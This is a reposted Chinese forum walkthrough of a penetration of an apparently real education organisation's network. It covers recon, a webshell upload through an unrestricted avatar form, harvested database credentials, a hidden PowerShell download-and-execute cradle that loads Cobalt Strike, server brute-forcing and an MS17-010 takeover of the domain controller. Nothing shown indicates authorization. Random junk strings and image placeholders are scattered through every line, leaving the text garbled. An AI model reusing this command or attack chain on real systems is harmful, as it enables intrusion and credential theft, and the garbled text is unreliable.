中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

0 x" O9 T% W# V4 s 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 - t1 G4 y, H' e; s {+ x1 V& ]

* R- a6 O/ @" `4 D

' C6 ]" A4 V! W6 j5 X  2 b* s. y2 w: A# z

5 y+ Y) Z ?' A2 M; ?/ ^2 Z

* k$ d% o" l: K! @ 正文6 e/ G3 [$ ]( _4 V

3 ]7 @1 |9 P' M8 `7 z

$ @$ c% i* p5 D; ^   $ V. I' a$ I$ ~/ Z. @8 ~

# C: G |8 v. x, Z' _5 ~4 d

+ o9 K4 r- U/ k7 ]( C6 c9 T 目标:www.xxxx.com(一家教育机构)
, _* ?; V, p& G8 {/ N打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能# A* T+ }/ E) e1 F: Q# b

+ g1 f# x+ v, I4 u O3 T

+ A a( k+ l+ E1 i vshapes= % f" L/ I% F( H2 N. a$ u! I

* m. K3 Y P6 K: F: w, s3 }

& X- R# p1 p. H5 h" G 进行了简单的信息搜集
+ ~8 ]6 T# ~% J9 t* B9 z9 W
" X+ M3 h7 G$ G" E! {/ ^ ' y3 v9 R3 p9 R$ T/ r8 M( h

2 ^* I1 ~! T% m1 e, A6 B+ a& O- u

& r. n1 U: w7 V; r 子域名搜集 ; a* m6 Y; l: b( }0 j

, F$ x8 m. X' ~& B, @; V7 o

& [" H1 z/ I! n vshapes= 3 Y- ~6 i; \2 H- ~! D' e8 K

6 R$ m8 W( V1 D+ e! Z

2 ~8 q/ G% x& q) o: I. K fofa找资产
7 b1 T$ t; B7 l% e* @7 J
. k; e7 }0 H1 H0 s( G ; u |- ?1 ~- F Q( ]" S& }

3 S" _! `) X3 h# E& j; s2 V- v) T

- w# l: ^, F H8 W( \) E vshapes=, T. l8 w% a. w# A- h; G' a9 |

' x5 q9 G3 n! w8 w) e* y5 @$ t

' D* R' ^) A: i, t& P2 m 一共七个资产。去重之后只有两个。
) C2 m9 K& e# [
7 ?0 P8 L( v2 [. L! |9 C . _: H0 d5 K/ ?/ s7 E

2 t. o( }8 \9 c' H) {% R+ P

7 t: c* Y( c, O6 x; H# |1 T& S 目录探测 5 U7 G% j: q8 N5 e

: Q3 c: V$ b! M. O: S! `

( K+ E; [0 a" ^3 n* F+ w* b vshapes=8 u& e# y, \+ j1 x. k/ H

, {1 n7 f4 Q. }3 D

( j( k8 K% p3 l5 W 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
! `' k/ _ z P; Y
* u8 m+ R* T! M# r ) p# D* D2 _( `( s0 w: S

9 ~; v/ H5 ~) ~6 U) M+ S

9 F2 Y) v2 p( ^( S( t: r, W 我又尝试了通过修改返回包来绕过登录界面& `5 A2 J/ Y0 b9 _$ G- m

) j2 F7 K3 W j2 P' I

$ `, j, w" U& u$ b) ] vshapes= : U2 x; j a$ ^9 A7 O: _6 ]

1 k8 R8 Z2 S; l9 s0 S5 i

& u. |9 @, {+ e$ U' h& Z2 {0 P; h 还是不行,尝试注入无果* e- N$ I$ p( C5 X/ P$ a8 _# R

) e7 O! l* g$ `

5 l3 C, ^1 ]0 R/ N vshapes=7 k5 p0 ]8 S( c! d( c) F+ r

8 g5 n- M! Y7 P

0 i) b2 x* _ L9 o; }" u. o* \$ m( P1 ^ 不过我目录探测出了一处Spring信息泄露
# g( C C$ W: V1 L4 W5 f7 [7 N
4 I) H6 U( V& V/ c7 K; G& F. h : A- c( p' U* H z, x# {# k" K

4 C0 H* q4 z9 [$ G5 b

7 F2 r! q! k9 d8 b# H% S4 ]3 ^ vshapes=& V7 o. z: ?- f( \" }: r1 M" ]0 I L

# H3 f! Y' v& y0 q- P: v& J! |! S

: D" g y: Z! n& a; d 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 $ n6 @: O6 h, T; \* L

6 K" R" _; q2 g6 X7 a7 i; q2 f, Z

4 d7 P# l2 T5 c0 l vshapes= $ i$ Y- Y+ G: ^+ i0 T

2 y f v/ k7 t4 v2 j+ _. z

" q' t3 u# i0 ]' D& R# ~7 O9 g 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 ( y1 X; u- O( w+ B; A9 w! o" E

9 k7 z; `% Y$ K- f, _& ?' `3 `

7 a1 b1 H# P2 B" t P: {+ Z vshapes= 0 K) G" ?; Z; c. F" {9 T

1 q& `6 f% b$ L D4 p# H

+ u7 N. X5 V. ?8 D8 a 获取有些师傅到这一步就手机抓包电脑测了。 6 K/ ]6 x& v0 D* D# u6 J( W& R( Y

! i) M D/ ~6 D" n- f% U# C7 h) ] I

( V$ ? T( u1 c! S) X Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 1 d5 a1 K) C. k0 v8 R

8 \/ H0 J; i' }' b

* u2 I! j! Z/ N' s" b6 [( j 其中在一个公众号发现了小程序,可以进行注册。 3 }) V( H7 m, J. l9 a) U$ k

5 s# N/ z+ }' f7 m; K9 _: h

) B4 s. _4 B/ v% w 看到了头像上传,尝试上传获取WebShell2 r9 |2 a. M" \5 F5 H1 G# ^

' K4 b4 n$ }7 q2 O/ ^

% \3 M5 A; t; R9 _+ T vshapes=- o* Z* i( ?6 @5 }

3 \' N% s: d6 U# K( n

) l! B! Z. E5 S* J$ G# i 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 # ]; G2 M$ \8 j) A3 D) N+ u: b

7 D9 K1 y" `3 R6 z

6 k/ {( _! v" w7 p vshapes=3 p/ I# Y7 d& ?; v

2 A! R" o( t4 w2 ~2 c1 m# N: k* G

+ q) k" }( g1 K2 w. o1 A, U 然后上了大马 % r) i; @) M6 o

8 H9 s6 S3 O+ A- D, {/ |2 }( `

/ |' A3 I9 A- K" z B2 C$ q$ V! x9 F( T vshapes=6 P" m! S- t3 }2 G

# k2 j! n4 b, f0 ?* @6 w

: i6 c& W' t1 c8 I. t2 I P vshapes=% J1 P, ^5 B/ ~) ?

" K2 @+ {5 j, Y) l; o7 X

' B" s; y" w9 R/ B# L* R" } 通过翻找文件发现数据库账号密码, h3 ?9 F% c2 `/ B

$ n$ y0 P7 g8 Q7 h2 H

`; ]3 Q, q% s3 ^2 H+ Z7 C vshapes= 4 X4 x# X* w* E) E6 @! X

+ g0 R0 r+ U# \1 y

; |% a" E) c0 N1 S* x --内网渗透4 m! y4 s; u. c6 w; [" J Z

1 W4 e. e9 o+ I0 C0 c b H

. h! T: D+ Y& \# c3 P 直接通过powershell执行 cs上线 ! O5 p4 j- M" g

4 y- c5 `* D% U. o+ t: H

/ n! g. i* n. o# J$ f3 A0 a4 J% m powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" ) {! z8 r0 W$ S& s/ K

i/ `! |2 P: }

0 w" R/ `9 {: D, h vshapes=( B% a: h6 U' z7 i. `& J$ T

! N0 {* V- |" _+ B7 E2 q3 _

! M- }& @$ q+ n 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 0 p' d# D8 h6 p% A P

8 z: i/ L( `5 | S* m+ E* w& K4 b

, S5 S$ }( |/ D vshapes=- h( @, a$ x' i8 z' a; H( H/ W

# T' t5 _" l4 J/ v: \! W

- L' s9 T: V% L4 f) U; C! w 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
7 a" _1 e9 o/ W/ |7 j0 C+ s h
: L7 }1 l U/ L `( M4 F
1 _& Y. w2 u; \$ X# b4 V* h [8 o8 Z) O

) U F/ u7 v) Y$ C

# a6 N/ t. C- [" Q vshapes=1 S8 ~$ d3 _# {8 h- x

; b5 [4 g. L3 L' H+ {. p

9 M# {" b( H; W$ g9 q# @ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
, S. h2 {" l7 w: q( @) C" }
/ z% j ]8 P% e2 K; B8 G& W& H! h* R$ Z+ {, ^+ g( i; M2 V8 A

4 s" {$ Q; E9 ]' C0 X8 m! c

: Z4 h- m4 m; {0 X" H. {8 K" y- f vshapes= 3 P' I% {2 N9 J7 c

/ ?+ _6 [" B/ r; \! g( x

, E/ i+ J1 ]0 }0 B- n' ]
, ^/ h" u# C% ^( R2 R* P. r
3 D" l+ H9 M4 S+ w( d5 x 0 K3 G# `4 G7 W7 h) s7 G( p

5 } u" Z4 K# e7 I

& p P l2 @2 S% J+ K' q   7 i3 c" M( k5 J/ R% A, N6 I

5 e/ I( C5 ^8 E# ~6 p, w

7 b: D- f. l* w, P: k' P5 G/ M 小结! F+ T& t$ i4 Q. m

# G# i+ [: d% Y7 H7 {' E

1 M) O/ D$ e& V8 p& u L$ k- G   - l1 Z0 q7 \& P0 P

& |; X. N( J; r- N5 `9 K

/ ]( m8 m5 _$ Y! F 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 4 Y1 R! f5 ?* f

, m! I) X, |: [, ~

, Z/ s) J" \ m5 _9 V, l   # G. F( D- p" r( W

5 u' }3 I, ^# B: { t5 A7 L7 ^+ U. I% B& O# n: t) ?- V* l7 ]9 B9 P6 G- v4 N

: k# d( w' L, K d9 J/ a# ^ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html $ L5 k# ]4 ]& r6 }# t! i3 N

3 x5 _7 r$ C7 z: x; |5 }) n

* q2 f/ f, v% N   \; f3 `# s% ~ u7 p- W8 t: Z





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2